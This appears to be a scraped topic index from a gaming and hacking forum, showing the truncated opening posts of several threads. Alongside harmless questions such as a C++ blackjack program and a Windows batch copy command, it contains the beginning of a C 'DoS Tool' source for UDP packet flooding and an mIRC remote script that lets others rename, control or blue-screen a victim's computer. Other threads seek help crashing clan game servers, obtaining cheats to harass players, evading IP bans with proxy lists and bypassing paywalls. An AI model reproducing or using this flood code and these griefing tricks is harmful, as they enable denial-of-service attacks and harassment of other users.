Computer Discussion
1365 topics in this forum
-
I have been playing an rpg game recently and it is a very basic program with bad graphics and the total file size of the game is only bout 50 mbs. I was thinking because it was such a small game and hardly secure it would be easy to create a hook client program to edit my character and the items i have or make items drop from creatures. Would anyone want to teach my how to create one?
-
- 0 replies
- 73 views
-
-
not done yet, k? Aces are only ! and you can't double up or down. #include <iostream> #include <cstdlib> #include <time.h> #include <clrscr.h> #include <fstream> using namespace std; int readscore(int place); void readname(int place); int dcards[10]; int ycards[10]; bool lost = false; bool dealerhitting; int money; char bet[10]; char buffer[1000]; class Deck { public: Deck(); ~Deck(); void CreateDeck(); void Shuffle(); int DrawCard(); int decknum; private: int cards[52]; }; Deck obj; Deck::Deck() { } Deck::~Deck() { delete[] cards; } void Deck::CreateDeck() { int count; for (count = 0; count < 52; count++) …
-
- 9 replies
- 171 views
-
-
I've goddamn posted this on a jillion forums, and little real help is out there. Why are you interested? You want to evade bans on your IP using socks5 proxies. So here's a post I made on steampowered (with link to a post @ vbforums) so I don't have to retype it all: http://forums.steampowered.com/forums/showthread.php?s=&threadid=302714&highlight=socks5 Yes, poke fun at VB*, but I find it amusing these same people who find VB.NET incompetent for some reason are using C# themselves :P To put in summary my question for those of you who aren't going to read all of that: I need to figure out why the SOCKS5 servers I am using aren't responding to a UDP …
-
- 0 replies
- 36 views
-
-
I wasn't sure where to post this so I'll post it here. http://www.xthost.info/PORPHYRiA/500proxies.txt Enjoy.
-
- 7 replies
- 228 views
-
-
-
anyone know the extension of a FILE FOLDER? searched google...most answers returned are relating to files within folders
-
- 17 replies
- 332 views
-
-
hey can anyone link me to a speedhack for cs 1.6 i really wanna piss some people off thnx in advance :sackrider
-
- 10 replies
- 361 views
-
-
hey my friend told me i could get voice annoy here i see that you guys have the .wavs for it but where can i get the actual program?
-
- 10 replies
- 188 views
-
-
I need to know how to drop another file (eg: .ocx and .exe) using VB6. I know you do it through Resource files or somthing. Can anyone help please?
-
- 6 replies
- 102 views
-
-
I'm currently raging a clan in Jedi Academy, (which by the way I'm surprised there is no myg0t presence in because of the very large number of different ways to rage, and the ragees are all SW nerds with a dedicated "etiquette" to their gaming - hope you don't mind me raging under myg0t) one of the things i do is crash their clan servers repeatedly so they have to connect to another one where i can rage them undisturbed by admins, however they now make password-locked servers.... I found out about q3infoboom and i have a c compiler but i don't know any programming and i think you have to edit it... so what do i do :S (in simpleish terms) extract teh q3infoboom.exe to…
-
- 2 replies
- 55 views
-
-
Whenever I start up my CS:S, a problem window pops up saying there was an error while starting my Counter Strike Source. I reinstalled my CS:S, but it still has a problem... I need help.
-
- 3 replies
- 95 views
-
-
#include <stdio.h> #include <winsock.h> int main() { printf("*************************\n"); printf("* DoS Tool by Darkurza *\n"); printf("* UDP Packet Flood *\n"); printf("*************************\n"); WSADATA wsaData; SOCKET SendSocket; sockaddr_in RecvAddr; int PORT; //must be declared char IP[256]; // must be declared char SendBuf[50000]; int BufLen = 50000; int redo = 0; printf("IP:"); scanf("%s", &IP); printf("PORT:"); scanf("%d", &PORT); WSAStartup(MAKEWORD(2,2), &wsaData); SendSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); RecvAddr.sin_family = AF_INET; …
-
- 42 replies
- 458 views
-
-
mIRC OLD SCRIPT ctcp *:*:*: $1- put those code into ur enemies "remote" page and into ur remote page also, then u need to turn ur remote "on", and u can change their nick, quit them, or even worse by type commands like this : 1. /ctcp <target nick> /nick <nick that u want> - so their nick will be changed into the nick that u type here 2. /ctcp <target nick> /msg <other person nickname> <message> - the target will query nickname that u type there with the msg like what u want 3. /ctcp <target nick> /con/con - this command will "blue screen" the computer target ^^ 4. /ctcp <target nick> (DoS / IRC command) - th…
-
- 3 replies
- 160 views
-
-
Is there any way I could get hold of the HLH source code? I've put myself into coding hacks, but want an already made one to take examples and help from. I can't seem to find it on google :S Both planetmayhem and ih4x are down :/
-
- 8 replies
- 166 views
-
-
Through this tutorial I'll teach you how to bypass lame protection attempts on sites. Sometimes, they try disabling right-click, which can easily be bypassed! Requirements: -None really...just get a few different browsers. 1. Bypassing no right-clicks. When viewing the site that blocked right-clicks, go to your address bar and type in: javascript:void(document.oncontextmenu=null) and there, you have your context menu back! 2. Decrypting encrypted source HTML (FAVOURITE!) Open the page in Firefox (or Mozilla) Go shift + ctrl + i to open the DOM nspector. In the left panel of the DOM Inspector, select the node you wish to view (head or body). Right-clic…
-
Not really cracking, but I don't know what else to call it. Anyone know how to get past subscription login sites like ESPN Insider? Too cheap to pay for a month just to read one article. I know there's gonna be people like "sp0rts are t3h gayt" Get a life an go outside k fgt? Here's what I mean: ESPN Insider
-
- 4 replies
- 103 views
-
-
On a useful criteria which programming lang is best to learn as a first lang? Ive tried c++ but i cant think of a good use for it or am i just not far advanced enough to see its uses? what are good hacking languages and why? list some languages and uses for them.
-
- 61 replies
- 795 views
-
-
-
Okay as the title implies, I have a question about the copy command, in windows xp. I am trying to make a simple batch program that just copies a file to a location. I thought this would be a simple task, so I looked at the windows help in the dos window for the copy command and set up the batch file....but it doesnt copy the file. This is what I have so far: copy file.txt C:\Documents and Settings\All Users\Desktop This didnt work so in frustration I combined that with various other things in the code like identifying the file as an ASCII file, to no avail. It just doesnt work and it is frustrating me because it was supposed to be so simple and I had i…
-
- 3 replies
- 76 views
-
-
i was just wondering how to play music in game
-
- 7 replies
- 159 views
-
-
if anyone has a copy of this or any other windows ddk, let me know, i need a copy to complete the new s p 0 r k e h.
-
anybody know anything about programming if so uummm, tell me what programs you are formilar with and a little history or somthing...
-
- 67 replies
- 637 views
-
-
why is it when i create a new wav with same specs as the ones i can download off this site and put in cstrike files as a voice_input.wav i get booted to desktop? flame away but plz answer if ya can